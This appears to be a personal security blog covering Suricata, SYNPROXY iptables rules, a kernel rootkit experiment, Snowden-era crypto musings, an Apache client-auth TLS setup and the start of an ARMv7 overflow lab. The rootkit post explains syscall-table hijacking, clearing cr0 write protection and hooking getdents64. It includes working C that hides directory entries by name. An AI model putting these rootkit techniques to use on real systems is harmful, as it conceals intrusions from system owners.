ethtool -K eth1 gso off
ethtool -K eth1 rx off
ethtool -K eth1 tx off
ethtool -K eth1 sg off
ethtool -K eth1 rxvlan off
ethtool -K eth1 txvlan off
ethtool -N eth1 rx-flow-hash udp4 sdfn
ethtool -N eth1 rx-flow-hash udp6 sdfn
ethtool -n eth1 rx-flow-hash udp6
ethtool -n eth1 rx-flow-hash udp4
ethtool -C eth1 rx-usecs 1000
ethtool -C eth1 adaptive-rx off

Run the Suricata with this command:
/usr/local/suricata/bin/suricata -c /usr/local/suricata/etc/suricata/suricata.yaml -i eth1

Use firefox/chrome on your host machine and visit some website with pictures on it.

You should see some girl pictures in /var/log/suricata/files ;-)

btw: Thanks to the Suricata community for bringing us this fuc*ing awesome IDS/IPS project. Special thanks to Peter Manev.

Wednesday, March 19, 2014

SYNPROXY: the great DoS mitigation solution

I don't expect to see a perfect DoS solution in my lifetime ;-) As we know, there are tons of commercial gateway-level boxes that can mitigate DoS attacks in some ways. But I prefer the combination of x86+GNU/Linux, like most old school guys. Why? My answer is simple: it's the fuc*ing cheapest solution we have. SYNPROXY is one of the newer features of the linux kernel (merged in 3.12, so 3.13 has it). It's based on the netfilter framework and connection tracking. If I understand correctly, the recipe marks the initial SYN packet as UNTRACKED in the raw table and hands it to the iptables target "SYNPROXY" (a target like ACCEPT, DROP, NFQUEUE, etc.). SYNPROXY then acts like a network gateway device (router?) and performs the regular TCP 3-way handshake with the client itself, using SYN cookies, so no conntrack entry exists until the client has proved it can finish the handshake. Only then is the connection opened towards the destination and the packets passed on. The contributor Jesper Dangaard Brouer gave a free speech at DevConf.cz last month. According to the test results in his slides, the numbers really look good. I did a little test with my colleague today.

Platform: Debian, SLES-12-beta2
Hardware: Laptop, Server, 100Mbps Switch
Tools: hping3, metasploit

root@d6-test:/home/shawn# iptables -t raw -A PREROUTING -i eth0 -p tcp --dport 8888 --syn -j NOTRACK
root@d6-test:/home/shawn# iptables -A INPUT -i eth0 -p tcp --dport 8888 -m state --state UNTRACKED,INVALID -j SYNPROXY --sack-perm --timestamp --mss 1480 --wscale 7 --ecn
echo 0 > /proc/sys/net/netfilter/nf_conntrack_tcp_loose

Two notes on the rules above. First, Jesper's full recipe adds one more INPUT rule after the SYNPROXY one that drops everything still in state INVALID, so packets the proxy did not validate never reach the listening socket. Second, --mss is what the proxy advertises to the client on the backend's behalf, so it should match the backend; on plain Ethernet that is 1460 (1500 minus IP and TCP headers), and 1480 invites segments the path can't carry without fragmentation.

Result:
Without SYNPROXY: ksoftirqd is around 8%-9%
With SYNPROXY: ksoftirqd is less than 3%

btw: This result may not be very accurate. Anyway, SYNPROXY works.

Thursday, February 06, 2014

Simple linux rootkit on Debian with kernel 3.13

I wasted a lot of time in 2013. I always found some shitty excuses, like "I'm fucking busy recently", to delay my hacking journey into kernel rootkits. This was supposed to be done a couple of months ago. Thank L0rd! I found a slot during the Chinese new year vacation at my hometown and began the adventure of rootkit hacking. I've read a bunch of great Phrack papers from the good old hacking days. It's old, but it helps.

---------------------------------------------------------------
[Weakening the Linux Kernel, Phrack Magazine Volume 8, Issue 52
January 26, 1998, article 18 of 20]
http://www.phrack.org/issues.html?issue=52&id=18&mode=txt

[Advances in Kernel Hacking, Volume 0x0b, Issue 58, Phile #0x06 of
0x0e]
http://www.phrack.org/issues.html?issue=58&id=6&mode=txt

[Handling Interrupt Descriptor Table for fun and profit, Volume 0x0b,
Issue 59, Phile #0x04 of 0x12]
http://www.phrack.org/issues.html?issue=59&id=4&mode=txt

[Kernel Rootkit Experiences, Volume 0x0b, Issue 61, Phile 0x0e of
0x0f]
http://www.phrack.org/issues.html?issue=61&id=14&mode=txt

[Mystifying the debugger, Volume 0x0c, Issue 65, Phile #0x08 of
0x0f]
http://www.phrack.org/issues.html?issue=65&id=8&mode=txt

Especially thanks to THC's paper, which was released in 1999:
[Complete Linux Loadable Kernel Modules]
https://www.thc.org/papers/LKM_HACKING.html
---------------------------------------------------------------

I wrote a simple rootkit that can only hide a specific file. Just a
few old school steps make that feature possible:

Firstly, we need to find the system call table. It's no longer
exported since 2.6 (it is still listed in System.map, but reading that
from a module is not portable). Fortunately, a few system calls
themselves are still exported, and sys_close() is one of them:
--------------------------------------
root@d6-test:/home/shawn# grep sys_close /boot/System.map-3.13.0
c10e0aa1 T sys_close
c140fdc4 R __ksymtab_sys_close
c141815c r __kcrctab_sys_close
c1420e33 r __kstrtab_sys_close
--------------------------------------

I used a brute force way to locate the system call table. I learned it
from memset's blog:
https://memset.wordpress.com/2011/03/18/syscall-hijacking-dynamically-obtain-syscall-table-address-kernel-2-6-x-2/

Starting from the kernel's memory base (0xc0000000, PAGE_OFFSET on
32-bit x86), it walks memory one pointer at a time until it finds a
table whose __NR_close slot holds the address of sys_close().

Then the write protection bit in cr0 has to be cleared, otherwise
writing to the read-only table faults. WP is bit 16 of the cr0 register:

31  30  29  28          19  18  17  16  15         6  5  4  3  2  1  0
+----------------------------------------------------------------------+
|PG|CD |NW|-----------------|AM|---|WP|--------------|NE|ET|TS|EM|MP|PE|
+----------------------------------------------------------------------+

After the above steps, we are able to hijack the system call we
want. Here I chose to hijack getdents64(). Why? Because all I wanna
do is hide a specific file from "ls". Let's see what "ls" usually
does:
------------------------------------------
// begin.........
execve("/bin/ls", ["ls"], [/* 16 vars */]) = 0
brk(0)                                  = 0x8366000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7791000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=19346, ...}) = 0
.......................
.......................
.......................
// look, that's it
getdents64(3, /* 17 entries */, 32768)  = 544
getdents64(3, /* 0 entries */, 32768)   = 0
close(3)                                = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7790000
.......................
// then it would display them in the standard out(1)
write(1, "a.out  dirent.c  dirent.c~  insi"..., 107a.out  dirent.c  dirent.c~  insight-lab  libmnl  libnftables  linux-3.13  linux-3.13.tar  my_tmp  nftables
) = 107
.......................
------------------------------------------

The only kernel struct we have to deal with is the directory entry
record that getdents64() fills the buffer with (from the getdents(2)
man page):
-------------------------------------------------------------------
           struct linux_dirent64 {
               ino64_t        d_ino;    /* 64-bit inode number */
               off64_t        d_off;    /* 64-bit offset to next structure */
               unsigned short d_reclen; /* Size of this dirent */
               unsigned char  d_type;   /* File type */
               char           d_name[]; /* Filename (null-terminated) */
           };
-------------------------------------------------------------------

(The older getdents() call uses the similar struct linux_dirent, which
carries d_type as the last byte of the record instead.) d_reclen is the
size of the current linux_dirent64 record, padding included; it is what
you step by to reach the next record, and what you subtract from the
returned length when you drop one. It does matter. Plz read the fucking
source code for any detail! Well, like in the good old days, I drew a
big ASCII picture here.
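The filtering step itself, as an added example of mine (not the rootkit from the post): hide_entries() walks a getdents64() buffer by d_reclen and slides out every record whose name starts with a prefix, which is exactly what a hooked sys_getdents64 does to the buffer (after copy_from_user) before copying it back and returning the shortened length. It runs in user space so you can test the pointer arithmetic without a kernel module: main() applies it to a real listing of ".", and demo_hide_bytes()/demo_hide_count() apply it to a constructed four-entry buffer (inode numbers and names invented) so the expected byte counts can be checked. The stop-on-corrupt-record check matters in the kernel version too: a bogus d_reclen would otherwise walk you off the end of the buffer.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Record layout getdents64(2) writes into the caller's buffer. */
struct linux_dirent64 {
    uint64_t       d_ino;
    int64_t        d_off;
    unsigned short d_reclen;
    unsigned char  d_type;
    char           d_name[];
};

/* Remove every record whose name starts with `prefix` from a getdents64()
 * buffer of nbytes, sliding the rest down, and return the new byte count.
 * This is the pass a hooked sys_getdents64 runs over the user buffer. */
size_t hide_entries(char *buf, size_t nbytes, const char *prefix)
{
    size_t plen = strlen(prefix), off = 0;
    while (off < nbytes) {
        struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + off);
        unsigned short reclen = d->d_reclen;
        if (reclen == 0 || off + reclen > nbytes)
            return nbytes;          /* corrupt record: stop, don't run off the end */
        if (strncmp(d->d_name, prefix, plen) == 0) {
            memmove(buf + off, buf + off + reclen, nbytes - off - reclen);
            nbytes -= reclen;       /* the next record now sits at `off`: re-check it */
            continue;
        }
        off += reclen;
    }
    return nbytes;
}

/* Number of records in a getdents64() buffer. */
int count_entries(const char *buf, size_t nbytes)
{
    int n = 0;
    size_t off = 0;
    while (off < nbytes) {
        const struct linux_dirent64 *d = (const struct linux_dirent64 *)(buf + off);
        if (d->d_reclen == 0 || off + d->d_reclen > nbytes) break;
        off += d->d_reclen;
        n++;
    }
    return n;
}

/* Append one record the way the kernel lays it out: header, name, NUL,
 * padded to a multiple of 8.  Returns the new buffer length. */
size_t add_entry(char *buf, size_t off, uint64_t ino, unsigned char type, const char *name)
{
    struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + off);
    size_t reclen = (offsetof(struct linux_dirent64, d_name) + strlen(name) + 1 + 7) & ~(size_t)7;
    d->d_ino = ino;
    d->d_off = (int64_t)(off + reclen);
    d->d_reclen = (unsigned short)reclen;
    d->d_type = type;
    strcpy(d->d_name, name);
    return off + reclen;
}

/* Constructed listing (not read from a real directory): 24+32+32+32 = 120 bytes. */
static size_t build_demo(char *buf)
{
    size_t n = 0;
    n = add_entry(buf, n, 2,   4, ".");            /* DT_DIR = 4 */
    n = add_entry(buf, n, 100, 8, "a.out");        /* DT_REG = 8 */
    n = add_entry(buf, n, 101, 8, "secret_key");
    n = add_entry(buf, n, 102, 8, "dirent.c");
    return n;
}

/* Bytes left in the demo buffer after hiding `prefix`. */
size_t demo_hide_bytes(const char *prefix)
{
    static char buf[256] __attribute__((aligned(8)));
    return hide_entries(buf, build_demo(buf), prefix);
}

/* Records left in the demo buffer after hiding `prefix`. */
int demo_hide_count(const char *prefix)
{
    static char buf[256] __attribute__((aligned(8)));
    size_t n = hide_entries(buf, build_demo(buf), prefix);
    return count_entries(buf, n);
}

int main(void)
{
    static char buf[32768] __attribute__((aligned(8)));
    int fd = open(".", O_RDONLY | O_DIRECTORY);
    long n = fd < 0 ? -1 : syscall(SYS_getdents64, fd, buf, sizeof buf);
    size_t off = 0;
    if (n <= 0) { perror("getdents64"); return 1; }
    /* Same pass a rootkit would do in the kernel, here on a real listing of "." */
    n = (long)hide_entries(buf, (size_t)n, "secret");
    while (off < (size_t)n) {
        struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + off);
        printf("%s\n", d->d_name);
        off += d->d_reclen;
    }
    close(fd);
    return 0;
}
```

Note that d_off in the surviving records still points at offsets in the original layout; ls does not use it for sequential reads, but a filesystem-aware checker comparing d_off chains against a fresh listing is one of the cheap ways to catch this kind of hiding.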

May the L0rd's hacking spirit guide us!!!

Wednesday, December 25, 2013

Life was never easy...especially in post-prism era;-)

I've watched a great free speech today:

Bruce Schneier, our great philosopher in the cybersec field. And Eben Moglen, afaik, a great hacker (not in computer stuff) in the free software law field. I remember listening to Eben's free speech (electronic version) when I was in college. Seven years on, I understand better why there is a group of people who have been trying to fight for digital rights, software freedom, etc.....

I'm here to share something I've learned from Bruce and Eben today. This writeup is going to be my notes and some personal summary of 2013. It may be a little bit messy;-)

What do we learn from Mr Snowden's disclosure about crypto?
------------------------------------------------------------------
Cryptography itself is still hard to break. The NSA is not breaking the math; it breaks in by cheating: stealing private keys, forging certificates, doing non-crypto stuff to achieve its *dirty* goals. Even in the fucked-up Google case, the NSA didn't crack the traffic between the user's browser and Google's server, because Google uses client-auth SSL by default and, more importantly, it works (the NSA doesn't like it). But the NSA hijacked the traffic between Google data centers, where SSL/TLS was removed for whatever reason (cost?). Crypto is still one of the best ways to fight the NSA or NSA-like organizations.


Tor stories?
------------------------------------------------------------------
Personally, I like Tor. It could probably save people's lives in some "restricted" areas. Tor pisses off agencies like the NSA. The contributors of the Tor project have routine seminars; it seems the discussion of how to break Tor is their daily bread;-) Thanks to the Tor project contributors.

What if NSA is in our threat model?
------------------------------------------------------------------
The first thing is mitigation: the NSA has a piece of math but still needs a bunch of engineers to make it work. Make the NSA pay a higher cost (in time budget, not new math). Plz use particular crypto technology (on your GNU/Linux distro) as much as possible. It's reasonable to speculate that the NSA knows something about crypto that we don't. Information asymmetry does exist. Of course the NSA has known what we did in past decades, but we rarely know what the NSA has been doing in the same period..so thanks to Mr Snowden's disclosure, which gave us *a little more* information.

And NSA-like organizations definitely need a lot of automated attack tools: FOXACID? The reason is simple: you can't just train people off the street to become old school hackers in a few months. That's why they have to develop automated tools.

btw: What does "old school hacker" mean in my context? A type of people who are highly skilled with low-level techniques, such as *NIX systems, networking (both internet stuff and the core network of telcos), reversing, cryptography, C/ASM code audit, etc., and who also have a specific type of strong philosophy with underground spirit;-)....ug spirit~wth

Standard corruption?
------------------------------------------------------------------
Not all standards are a security matter. Bruce thinks AES is still secure. We can't blame only the Dual EC stuff on the standards process's fault. Implementation is important: the international cellphone standard, with no NSA involved, was fucked up..A5/1? Ring a bell? We should only trust those public standards which our guys (free software enthusiasts, cybersec philosophical anarchists like the Phrack guys, or people like Bruce?:)) are involved with.

What tools can we trust?
------------------------------------------------------------------
GnuPG, Tor, OTR, etc... Some of these open source tools are written by security/crypto paranoids. They have very awesome designs and implementations.

What if you are on the target list of NSA-like organization?
------------------------------------------------------------------
If you are targeted, there's nothing you can do at that level. Is this super-APT shit?

Is cyberwar going to be end?
------------------------------------------------------------------
I don't think so. If everyone holds the philosophy of "I'll fuck you if you don't fuck me first, sir", then the whole scene turns into everybody being fucked by everybody. That's what old school hackers have been through in the paradigm shift (painfully?) from the good old hacking days to "This is cyber, sir!".

Does that sound like we are hopeless?
------------------------------------------------------------------
Nope, quoting Bruce: "Society improves because people dare to think the unthinkable and then after 20, 30 years everyone says that was kind of a good idea. It takes a while but it has to start."


FOSS solutions?
------------------------------------------------------------------
Bruce thinks open source solutions are more secure than closed ones, because:
1, You can look at it (the source code)
2, It's harder for someone to slip something in

We probably don't need to worry too much (did I say "too much"?) about the NSA having tried/trying to put backdoors into fundamental free software projects, like the linux kernel, GCC, glibc, the "supposed to be re-written" openssl;-) etc. Because according to the disclosed documents, the NSA seems amazingly risk-averse. They only want to take the safe path. Yeah..yeah, I know what they're thinking...you can do evil, but don't get caught;-) The free/open source community has a lot of old school hackers who have been doing code review for decades. They did a great job. And they are going to continue this *secret* war against NSA-like organizations. So it's not easy to attack (backdoor) a compiler.....( and, there are tons of guys like me trying to become old school hackers).

Leap of faith?
------------------------------------------------------------------
Yeah, it sounds perfect. But no one can ensure you are 100% secure. And the fact is that you can't examine everything. You must trust them (the tools you use). Give yourself a little faith. Did Søren Kierkegaard say that we could feel comfortable using GCC;-)

Well, using Apple products (iPhone, iPad, iShit) and Microsoft products (Windows as a gaming platform, Office for whatever) is not a good option. Drop them, come on!

Hardware box issues: never updated against the fully disclosed vulns:
------------------------------------------------------------------
In some countries, the cybersec business can't support small businesses. The reason is that most customers had/have the wrong concept of cybersec. They think the only thing you need to do is
buy a bunch of hardware boxes (firewall, IDS/IPS, UTM, NGFW, or whatever). Obviously, that violates the very important old school principles:
------------------------------------------------------------------
Security is NOT:

Security is NOT installing a firewall ..
Security is NOT a Product or Service .. ( by Schneier, Bruce )
Security is Not a Product; It's a Process .. ( by Schneier, Bruce )
A Security Audit is NOT "running a port scan and turning things off" ..


Security is:

Security is "Can you still continue to work productively/safely, without compounding the security breach"
Security is only as good as your "weakest link"
Security is "risk management" of your corporate resources(computers/people), required expertise, time management, implementation costs, data backup/recovery procedures ...
Security is a Process, Methodology, Costs, Policies and People
Security is "Can somebody physically walk out with your computers,
disks, tapes, .. "
Security is 24x7x365 ... constantly ongoing .. never ending
Security is "learn all you can as fast as you can, without negatively
affecting the network, productivity and budget"
------------------------------------------------------------------

In the past few years, more and more enterprise management guys have realized that those hardware boxes can't solve the problem they were supposed to solve.* Right here, there's one thing you might want to know: some "sec box" vendors have been using a lot of open source code (linux kernel, snort, l7, Bro, etc.) but they never contribute back to the community. *........Personally I do believe that only old school cybersec principles can make a system secure. But it needs skilled people to do a lot of work in the daily cybersec process. Well, the mainstream marketing still advertising the *boxes* solution is one thing; that it's hard to find old school guys is another.

What I'm trying to say is not that hardware boxes are unimportant. But people can also do small business by finding cheap and effective solutions. That's where open source cybersec solutions fit in. There are a lot of great cybersec open source projects. All you have to do is pay someone who knows
these cybersec open source code bases and combines them into your own cybersec solution. For example, a customer wants to harden their network and servers. There are a lot of open source sec projects that can do that, such as
iptables/snort/psad/tcpwrapper/apparmor/openssl/apache or web-level
hardening stuff (Django's built-in SQL injection protection, mod_security, etc.). But the customer would pay someone who knows about it to consult for
them. The skilled guy could train the customer's IT guys or go through
with their own implementation. Personally, I think it's the best way to do
cybersec small business. It's a win-win solution! Old school guys get
paid and customers are happy.

btw: Some regions may have this cybersec small business model already.
--------------------------------------------------------------------------

Well, it's Christmas today. As a Neo-Calvinist, I wouldn't talk about religion too much in my daily life. But all in all, a neo-Calvinist is a Christian indeed. I'm not too religious. Sometimes, I really hate those nominal Christians who feel so good doing terrible things in the name of God....fuc* them....Anyway, a hacker is a type of person who is willing to seek the truth no matter the cost. Even if I saw L0rd Jesus looking like the Overmind (from StarCraft) after I die, the problem to me would be "Is it true my L0rd looks like the Overmind?"; if he is the L0rd, whatever he looks like, I'd still worship him;-)

Hacker can pick the red pill.
Hacker can destroy the blue pill.
Hacker can embrace the desert of the real.

Merry Christmas, my fellow brothers/sisters!

May L0rd's hacking spirit guide us in 2014!!!

Wednesday, November 27, 2013

How to set up apache2 with SSL/TLS support and client auth on Debian 7.2

I think SSL/TLS should be part of the security hardening process. Only fools would not use cryptography in the post-PRISM era. I think what Mr Snowden did proved one thing: Richard Stallman and the Phrack guys (I prefer the term "philosophical anarchist") never lied to us;-) Well, I don't wanna bullshit about this controversial topic here...let's see how we can set up an HTTPS server with client auth.

Generate CA certificates:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# cp /usr/lib/ssl/misc/CA.sh .
root@d6-test:/opt/ssl# ./CA.sh -newca
CA certificate filename (or enter to create)

Making CA certificate ...
Generating a 2048 bit RSA private key
..................................+++
..............................................+++
writing new private key to './demoCA/private/./cakey.pem'
.............................................
.............................................
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-shit.com

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
Using configuration from /usr/lib/ssl/openssl.cnf
Enter pass phrase for ./demoCA/private/./cakey.pem:
Check that the request matches the signature
Signature ok
Certificate Details:
        Serial Number:
            c0:81:0e:bc:52:d0:19:5a
        Validity
            Not Before: Nov 19 02:08:14 2013 GMT
            Not After : Nov 18 02:08:14 2016 GMT
        Subject:
            countryName               = CN
            stateOrProvinceName       = Shanghai
            organizationName          = MOT
            organizationalUnitName    = MOT
            commonName                = hardened-shit
            emailAddress              = info@hardened-shit.com
        X509v3 extensions:
            X509v3 Subject Key Identifier:
                D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63
            X509v3 Authority Key Identifier:
                keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63

            X509v3 Basic Constraints:
                CA:TRUE
Certificate is to be certified until Nov 18 02:08:14 2016 GMT (1095 days)

Write out database with 1 new entries
Data Base Updated
--------------------------------------------------------------------------------

Copy intermediate key and certificate:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# cp demoCA/private/cakey.pem ca.key
root@d6-test:/opt/ssl#
root@d6-test:/opt/ssl# cp demoCA/cacert.pem ca.crt
--------------------------------------------------------------------------------

Generate server key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl genrsa -des3 -out server.key 2048
Generating RSA private key, 2048 bit long modulus
...+++
.................+++
e is 65537 (0x10001)
Enter pass phrase for server.key:
Verifying - Enter pass phrase for server.key:
--------------------------------------------------------------------------------

Generate the server CSR (Certificate Signing Request) with the server key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -new -key server.key -out server.csr
...........................................
........................................
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-shit.com

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
--------------------------------------------------------------------------------

Generate the server certificate:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -x509 -days 2048 -key server.key -in server.csr > server.crt
Enter pass phrase for server.key
--------------------------------------------------------------------------------

You can check out the cert or verify it:
openssl x509 -noout -text -in server.crt
openssl verify -CAfile ca.crt server.crt


Generate client's key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl genrsa -des3 -out client.key 2048
Generating RSA private key, 2048 bit long modulus
..........................................................................................................................................+++
........+++
e is 65537 (0x10001)
Enter pass phrase for client.key:
Verifying - Enter pass phrase for client.key:
--------------------------------------------------------------------------------

Client's CSR:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -new -key client.key -out client.csr
.......................................................
..............................................
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-info.com

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

Generate client's certificate with CA certificate's signature:
root@d6-test:/opt/ssl# openssl ca -in client.csr -out client.crt
Using configuration from /usr/lib/ssl/openssl.cnf
Enter pass phrase for ./demoCA/private/cakey.pem:
Check that the request matches the signature
Signature ok
Certificate Details:
        Serial Number:
            c0:81:0e:bc:52:d0:19:5c
        Validity
            Not Before: Nov 19 02:28:13 2013 GMT
            Not After : Nov 19 02:28:13 2014 GMT
        Subject:
            countryName               = CN
            stateOrProvinceName       = Shanghai
            organizationName          = MOT
            organizationalUnitName    = MOT
            commonName                = hardened-shit
            emailAddress              = info@hardened-info.com
        X509v3 extensions:
            X509v3 Basic Constraints:
                CA:FALSE
            Netscape Comment:
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier:
                A6:A5:D7:7C:C7:A8:C3:24:C7:90:14:76:84:15:43:D0:2C:0C:31:66
            X509v3 Authority Key Identifier:
                keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63

Certificate is to be certified until Nov 19 02:28:13 2014 GMT (365 days)
Sign the certificate? [y/n]:y


1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Data Base Updated
--------------------------------------------------------------------------------


Convert to PKCS#12 format, which Firefox can import:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl pkcs12 -export -clcerts -in client.crt -inkey client.key -out client.pfx
Enter pass phrase for client.key:
Enter Export Password:
Verifying - Enter Export Password:
--------------------------------------------------------------------------------

Enable SSL/TLS support in Apache2:
--------------------------------------------------------------------------------
root@hardened-shit:/opt# mv ssl /etc/ssl/hardened-shit

root@hardened-shit:/etc/apache2# a2ensite default-ssl
Enabling site default-ssl.
To activate the new configuration, you need to run:
  service apache2 reload
root@hardened-shit:/etc/apache2# a2enmod ssl
Module ssl already enabled

edit /etc/apache2/sites-enabled/default-ssl:
        SSLCertificateFile    /etc/ssl/hardened-shit/server.crt
        SSLCertificateKeyFile /etc/ssl/hardened-shit/server.key

        SSLCertificateChainFile /etc/ssl/hardened-shit/ca.crt

        SSLCACertificatePath /etc/ssl/hardened-shit/
        SSLCACertificateFile /etc/ssl/hardened-shit/ca.crt

        SSLVerifyClient require
        SSLVerifyDepth  10

Disable port 80:
root@hardened-shit:/etc/apache2# a2dissite default
--------------------------------------------------------------------------------

Done....it should work.

btw: I highly recommend reading these two articles if you want to know more: Hardening Your Web Server's SSL Ciphers, and TLS Perfect Forward Secrecy support with Apache

I only enable the secure ciphers:
SSLCipherSuite HIGH:MEDIUM:!aNULL:!MD5
SSLProtocol +TLSv1.2 +TLSv1.1
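The whole procedure above, as an added example that is not part of the original post: a POSIX shell script that builds the same CA, server and client certificates non-interactively and ends with the `openssl verify` check mentioned above. Two things differ from the transcript on purpose. First, `openssl req -x509 ... -key server.key -in server.csr` produces a self-signed server certificate, so `openssl verify -CAfile ca.crt server.crt` fails and `SSLCertificateChainFile` has nothing to chain; the script signs the server CSR with the CA the same way the client CSR is signed (and keeps one self-signed copy only to show the failed check). Second, the keys are generated without a passphrase (no `-des3`) so the script can run unattended; the post's passphrase-protected keys are the safer choice on a real server. The subject names follow the post; the `pki.cnf` sections, the lifetimes, the `client-1` subject and the `demo` export password are assumptions made for this script.

```shell
#!/bin/sh
# Added example, not from the original post: build the post's CA -> server ->
# client PKI non-interactively and verify both leaf certs against the CA.
# Subject names follow the post; everything in pki.cnf, the lifetimes, the
# "client-1" subject and the "demo" export password are assumptions.
set -eu

# A private openssl config so nothing depends on the distro's openssl.cnf.
# Each leaf gets exactly the extended key usage its role needs.
write_cnf() {
    cat > "$1/pki.cnf" <<'EOF'
[ req ]
distinguished_name = dn
prompt             = no
x509_extensions    = ca_ext
[ dn ]
C  = CN
ST = Shanghai
O  = MOT
CN = hardened-shit CA
[ ca_ext ]
basicConstraints     = critical,CA:TRUE
keyUsage             = critical,keyCertSign,cRLSign
subjectKeyIdentifier = hash
[ server_ext ]
basicConstraints = CA:FALSE
keyUsage         = digitalSignature,keyEncipherment
extendedKeyUsage = serverAuth
subjectAltName   = DNS:hardened-shit
[ client_ext ]
basicConstraints = CA:FALSE
keyUsage         = digitalSignature
extendedKeyUsage = clientAuth
EOF
}

# Key + CSR + CA-signed cert for one leaf.  $1=dir $2=name $3=ext section $4=subject
issue_leaf() {
    openssl genrsa -out "$1/$2.key" 2048 2>/dev/null
    openssl req -new -config "$1/pki.cnf" -key "$1/$2.key" -subj "$4" -out "$1/$2.csr"
    openssl x509 -req -in "$1/$2.csr" -CA "$1/ca.crt" -CAkey "$1/ca.key" -CAcreateserial \
        -days 365 -extfile "$1/pki.cnf" -extensions "$3" -out "$1/$2.crt" 2>/dev/null
}

make_pki() {   # $1 = output directory
    mkdir -p "$1"
    write_cnf "$1"
    # Root CA, CA:TRUE, self-signed: what CA.sh -newca produced in the post.
    openssl req -x509 -new -config "$1/pki.cnf" -newkey rsa:2048 -nodes \
        -keyout "$1/ca.key" -days 1095 -out "$1/ca.crt" 2>/dev/null
    issue_leaf "$1" server server_ext "/C=CN/ST=Shanghai/O=MOT/CN=hardened-shit"
    issue_leaf "$1" client client_ext "/C=CN/ST=Shanghai/O=MOT/CN=client-1"
    # PKCS#12 bundle for Firefox, CA cert included so the browser sees the chain.
    openssl pkcs12 -export -in "$1/client.crt" -inkey "$1/client.key" \
        -certfile "$1/ca.crt" -passout pass:demo -out "$1/client.pfx"
    # The post's server step: `req -x509` on the CSR. Kept only to show that the
    # result is self-signed and therefore does not verify against ca.crt.
    openssl req -x509 -config "$1/pki.cnf" -key "$1/server.key" -in "$1/server.csr" \
        -days 365 -out "$1/selfsigned.crt" 2>/dev/null
}

# The chain check the post mentions; the exit status is the verdict.
verify_against_ca() {   # $1=dir $2=cert file
    openssl verify -CAfile "$1/ca.crt" "$1/$2" >/dev/null 2>&1
}

# Extended key usage of a cert, e.g. "TLS Web Client Authentication".
cert_eku() {   # $1=dir $2=cert file
    openssl x509 -in "$1/$2" -noout -ext extendedKeyUsage | tail -n 1 | sed 's/^ *//'
}

# Usage: sh pki_demo.sh /tmp/hardened-pki
if [ -n "${1:-}" ]; then
    make_pki "$1"
    for c in server.crt client.crt selfsigned.crt; do
        if verify_against_ca "$1" "$c"; then
            echo "$c: OK   ($(cert_eku "$1" "$c"))"
        else
            echo "$c: FAILS verification against ca.crt"
        fi
    done
fi
```

`server.crt`, `server.key` and `ca.crt` then drop into the `SSLCertificateFile`, `SSLCertificateKeyFile` and `SSLCACertificateFile` directives above, and `client.pfx` is what Firefox imports. `cert_eku` is there to confirm each leaf carries only the role it was issued for: with `SSLVerifyClient require` every certificate chained to `SSLCACertificateFile` is a valid login, so giving the server certificate `serverAuth` and the browser certificate `clientAuth` keeps one from being presented in the other's place.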

Thursday, November 21, 2013

Hello, stack bufferoverflow on Debian ARMv7

I haven't made my hands *dirty* for a long time, since I stopped at io-wargame lvl11. As we all know, ARM architectures are becoming sec guys' daily bread. I think it's time to begin my journey exploring what the differences between ARMv7 and x86/x64 are out there. It would be good to build a testing environment in the pre-adventure stage. Debian has been supporting ARMv7 for a while. You can follow this great article to install a Debian GNU/Linux for ARMv7 (armhf) distro. After the installation, you probably want to configure a NAT network between the host and the qemu guest. Or just use my network config.

Figuring out the memory layout is a good starting point. Take a glance at the code first, plz.....

shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ gdb ./victim -q
